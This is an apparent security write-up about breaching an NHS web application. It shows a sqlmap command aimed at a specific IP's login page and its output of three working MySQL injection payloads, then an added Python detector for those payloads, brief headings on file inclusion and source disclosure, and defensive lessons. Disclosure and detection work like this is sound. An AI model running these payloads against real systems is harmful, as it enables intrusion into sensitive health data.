Hacking the NHS for Fun and No Profit

Still not sorry for the shitty stock art.
$ python sqlmap.py -u 'https://194.176.105.219/login.php' --random-agent --data='username=test&password=test&btnLogin=Login' --batch --dbs
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 454 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=test' RLIKE (SELECT (CASE WHEN (3915=3915) THEN 0x74657374 ELSE 0x28 END))-- MgVq&password=test&btnLogin=Login
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test' AND (SELECT 5095 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT (ELT(5095=5095,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ppwP&password=test&btnLogin=Login
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 OR time-based blind (heavy query)
Payload: username=test' OR 4720=BENCHMARK(5000000,MD5(0x6d7a554b))-- GVLM&password=test&btnLogin=Login
---
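The three techniques sqlmap reported above each leave a distinctive fragment in the POST body. As an added example (not code from the original post or from sqlmap), here is a small Python detector that URL-decodes request bodies and flags those fragments; the tab-separated log layout and the sample lines are constructed for the example.

```python
"""Added example, not code from the original post: flag the three MySQL
injection techniques sqlmap reported against login.php by matching their
characteristic SQL fragments in URL-decoded POST bodies. The log lines and
the tab-separated 'client<TAB>path<TAB>body' layout are constructed here."""
import re
from urllib.parse import unquote_plus

# Each pattern is derived from one of the three sqlmap payloads shown above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S),
    "error-based (FLOOR)": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*\bGROUP\s+BY\b", re.I | re.S),
    "time-based blind": re.compile(r"\b(?:BENCHMARK|SLEEP)\s*\(", re.I),
}
# sqlmap terminates its payloads with "-- " plus a random token (e.g. "-- MgVq").
COMMENT_TAIL = re.compile(r"'.*--\s+\w+$", re.S)


def classify_body(raw_body: str) -> list[str]:
    """Return the technique names whose signature occurs in one POST body."""
    body = unquote_plus(raw_body)  # payloads arrive percent-encoded, '+' for spaces
    hits = [name for name, rx in SIGNATURES.items() if rx.search(body)]
    # Catch variants the signatures miss: a quote followed by a comment-terminated field.
    if not hits and any(COMMENT_TAIL.search(field) for field in body.split("&")):
        hits.append("quote + comment terminator")
    return hits


def scan_log(lines):
    """Return (client, path, techniques) for each log line whose body matches."""
    findings = []
    for line in lines:
        client, path, body = line.rstrip("\n").split("\t", 2)
        hits = classify_body(body)
        if hits:
            findings.append((client, path, hits))
    return findings


# Constructed sample log: one benign login and two sqlmap-style probes.
SAMPLE_LOG = [
    "10.0.0.5\t/login.php\tusername=alice&password=hunter2&btnLogin=Login",
    "10.0.0.9\t/login.php\tusername=test%27+RLIKE+%28SELECT+%28CASE+WHEN+%283915%3D3915%29"
    "+THEN+0x74657374+ELSE+0x28+END%29%29--+MgVq&password=test&btnLogin=Login",
    "10.0.0.9\t/login.php\tusername=test%27+OR+4720%3DBENCHMARK%285000000%2CMD5%280x6d7a554b%29%29"
    "--+GVLM&password=test&btnLogin=Login",
]

if __name__ == "__main__":
    for client, path, hits in scan_log(SAMPLE_LOG):
        print(f"{client} {path}: {', '.join(hits)}")
```

The fallback rule is deliberately broad; in practice it belongs behind a rate threshold per client so that a single stray apostrophe in a real username does not page anyone.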
It’s pronounced jif.
The “home” page displayed after logging in.
It’s still pronounced jif.

Local file inclusion in the log viewer

Source code disclosure

  • You don’t need NSA exploits to breach sensitive systems. A chain is only as strong as its weakest link.
  • Know your assets, and know them well. If you’re not in control, who is?
  • Don’t allow your internal applications to face the Internet, even if they require authentication.

https://twitter.com/NathOnSecurity
Nathan